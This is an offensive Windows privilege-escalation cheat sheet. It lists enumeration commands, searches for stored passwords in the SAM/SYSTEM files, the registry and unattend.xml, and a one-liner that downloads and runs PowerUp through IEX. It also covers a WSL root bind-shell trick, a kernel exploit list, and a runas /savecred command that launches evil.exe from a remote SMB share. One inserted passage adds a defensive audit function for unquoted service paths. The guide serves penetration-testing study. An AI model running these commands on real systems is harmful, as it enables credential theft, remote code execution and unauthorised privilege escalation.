Windows - Privilege Escalation
Tools
- Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock
- (Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities
- BeRoot - Privilege Escalation Project - Windows / Linux / Mac
- Windows-Exploit-Suggester
- windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
- Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind
Windows Version and Configuration
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe
Architecture
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
List all env variables
set
Get-ChildItem Env: | ft Key,Value
List all drives
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
User Enumeration
Get current username
echo %USERNAME% || whoami
$env:username
List user privilege
whoami /priv
List all users
net user
net users
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
List logon requirements; useable for bruteforcing
net accounts
Get details about a user (e.g. administrator, admin, current user)
net user administrator
net user admin
net user %USERNAME%
List all local groups
net localgroup
Get-LocalGroup | ft Name
Get details about a group (e.g. administrators)
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
Network Enumeration
List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
List current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List the ARP table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
List all current connections
netstat -ano
List firewall state and current configuration
netsh advfirewall firewall dump
List all network shares
net share
SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
Looting for passwords
SAM and SYSTEM files
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
Search for a file with a certain filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
Search the registry for key names
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
Read a value of a certain sub key
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
Passwords in unattend.xml
Location of the unattend.xml files
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Example content
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
</component>
The Metasploit module post/windows/gather/enum_unattend looks for these files.
IIS Web config
Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Processes Enumeration and Tasks
What processes are running?
tasklist /v
net start
sc query
Get-Service
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
Which processes are running as "system"
tasklist /v /fi "username eq system"
Do you have powershell magic?
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
List installed programs
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Startup tasks
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
PowerSploit's PowerUp
Spot the weak service using PowerSploit's PowerUp
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
Windows Subsystem for Linux (WSL)
Technique borrowed from Warlockobama's tweet
With root privileges, Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem, just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse.
wsl whoami
./ubuntu1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
Binary bash.exe can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
Alternatively you can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
Unquoted Service Paths
This is the Microsoft Windows Unquoted Service Path Enumeration Vulnerability. Every Windows service has a path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
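The resolution behaviour described above, as an added audit example that is not part of the original page: a PowerShell function that flags unquoted service paths containing whitespace, lists the shorter paths Windows would try first, and prints the quoted value that removes the ambiguity. The function name, service names and paths are constructed for illustration.

```powershell
# Added example, not from the original page: audit for unquoted service paths.
function Test-UnquotedServicePath {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$PathName
    )
    $path = $PathName.Trim()
    if ($path.StartsWith('"')) { return }      # quoted: no ambiguity

    # Executable = text up to the first ".exe" that is followed by whitespace
    # or end of string; anything after it is treated as arguments.
    $m = [regex]::Match($path, '^(?<exe>.+?\.exe)(?<args>\s.*)?$', 'IgnoreCase')
    if (-not $m.Success) { return }
    $exe = $m.Groups['exe'].Value
    if ($exe -notmatch '\s') { return }        # no whitespace: no ambiguity

    # At every space Windows may stop and try "<prefix>.exe" before the
    # intended binary. A file at any of these locations is worth investigating.
    $triedFirst = @()
    for ($i = 0; $i -lt $exe.Length; $i++) {
        if ($exe[$i] -eq ' ') { $triedFirst += $exe.Substring(0, $i) + '.exe' }
    }

    [pscustomobject]@{
        Name       = $Name
        PathName   = $path
        TriedFirst = $triedFirst
        QuotedFix  = '"' + $exe + '"' + $m.Groups['args'].Value
    }
}

# Constructed sample data: service names and paths are made up.
$sample = @(
    @{ Name = 'ExampleUpdater'; PathName = 'C:\Program Files\Example Vendor\Updater Service\updater.exe -k run' },
    @{ Name = 'ExampleAgent';   PathName = '"C:\Program Files\Example Vendor\agent.exe" --service' },
    @{ Name = 'ExampleTool';    PathName = 'C:\Tools\tool.exe' }
)
foreach ($s in $sample) {
    Test-UnquotedServicePath -Name $s.Name -PathName $s.PathName
}

# On a live host, feed it the real service list instead:
# Get-CimInstance Win32_Service | Where-Object PathName |
#     ForEach-Object { Test-UnquotedServicePath -Name $_.Name -PathName $_.PathName }
```

Only the first sample entry is reported. The remediation is to set the service's ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<Name> to the QuotedFix string.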
Kernel Exploit
List of kernel exploits: https://github.com/SecWiki/windows-kernel-exploits
#Security Bulletin #KB #Description #Operating System
- MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
- CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008)
- CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
- CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
- CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
- MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
- MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
- MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
- MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
- MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
- MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012)
- MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
- MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
- MS16-014 [K3134228] [remote code execution] (2008/Vista/7)
...
- MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
Runas
Use cmdkey to list the stored credentials on the machine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Then you can use runas with the /savecred option in order to use the saved credentials.
The following example is calling a remote binary via an SMB share.
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"